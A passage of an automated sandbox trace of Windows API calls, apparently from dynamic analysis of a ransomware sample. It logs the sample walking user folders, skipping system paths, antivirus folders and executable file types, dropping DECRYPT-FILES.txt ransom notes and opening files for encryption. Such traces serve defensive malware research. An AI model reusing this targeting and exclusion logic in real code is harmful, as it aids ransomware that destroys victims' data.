dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0180.569] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0180.569] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0180.569] lstrcatW (in: lpString1="User Pinned", lpString2="\\" | out: lpString1="User Pinned\\") returned="User Pinned\\" [0180.570] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="User Pinned\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Program Files") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch=":\\Windows") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Games\\") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\All Users") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="AhnLab") returned 0x0 [0180.570] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.570] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0180.570] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.570] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\0a16c9.tmp") returned 110 [0180.570] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.571] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0180.571] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.571] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\DECRYPT-FILES.txt") returned 117 [0180.571] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.571] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0180.571] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0180.571] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.571] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.571] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.571] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.571] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.571] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec0b7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.571] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.571] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.571] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.571] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.571] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.571] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.571] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.572] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.572] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.572] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.572] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.572] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.572] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.572] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.572] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0180.572] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.572] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0180.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\0a16c9.tmp" [0180.572] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.572] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.572] CloseHandle (hObject=0x0) returned 0 [0180.572] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.572] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa967640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.572] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.572] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0180.573] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0180.573] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0180.573] lstrcatW (in: lpString1="ImplicitAppShortcuts", lpString2="\\" | out: lpString1="ImplicitAppShortcuts\\") returned="ImplicitAppShortcuts\\" [0180.573] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="ImplicitAppShortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Program Files") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch=":\\Windows") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Games\\") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\All Users") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="AhnLab") returned 0x0 [0180.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.573] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0180.573] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.573] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\0a16c9.tmp") returned 131 [0180.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0180.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0180.574] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.574] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\DECRYPT-FILES.txt") returned 138 [0180.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0180.577] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0180.577] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0180.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.578] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.578] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.578] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.578] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec0b7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec0b7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec0b7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.578] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.578] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.578] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.578] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.578] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.578] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.578] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0180.578] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.578] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0180.578] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\0a16c9.tmp" [0180.578] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.579] CloseHandle (hObject=0x0) returned 0 [0180.579] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.580] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa98d7a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.580] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.580] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa98d7a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.580] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0180.580] CloseHandle (hObject=0x284) returned 1 [0180.580] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0180.580] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0180.580] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 